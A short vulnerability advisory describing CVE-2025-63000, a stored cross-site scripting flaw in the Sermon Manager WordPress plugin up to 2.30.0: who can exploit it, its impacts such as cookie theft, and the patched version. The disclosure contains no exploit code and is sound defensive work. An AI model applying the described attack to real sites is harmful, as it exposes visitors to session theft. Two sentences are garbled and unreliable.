CVE-2025-63000

Vulnerability

Overview

CVE-2025-63000 is a stored cross-site scripting (XSS) vulnerability in the Sermon Manager plugin for WordPress (sermon-manager-for-wordpress), affecting all versions through 2.30.0 [1]. The flaw originates from improper neutralization of user-supplied input during web page generation, allowing malicious script content to be permanently stored on the server and executed in the browsers of site visitors [1].

Exploitation

Requirements

Exploitation requires an authenticated user with at least Contributor-level privileges (the 'Required Privilege' level noted in the advisory) [1]. The attacker must then craft a payload containing malicious JavaScript, HTML, or other client-side code and inject it into a vulnerable field within the plugin's interface [1]. Because the injected scripts are stored on the server and later triggered when any user—including administrators or visitors—views the affected page, without requiring social engineering toward the victim [1].

Impact

A successful attack enables the adversary to execute arbitrary scripts in the context of the victim's browser session [1]. This can be used to steal session cookies, redirect users to phishing or malware-hosting sites, deface the website, or inject advertisements and other unwanted HTML content [1]. Because the script persists in the database, the attack can affect many users over time until the malicious content is removed or the plugin is secured.

Mitigation

The vendor has addressed this vulnerability in version 2.30.1 or later [1]. Users running Sermon Manager 2.30.0 or any earlier version are advised to update immediately [1]. For sites where immediate updating immediately, consider disabling the plugin, restricting contributor-level roles, or asking a web developer to apply input sanitization until the patch can be deployed [1].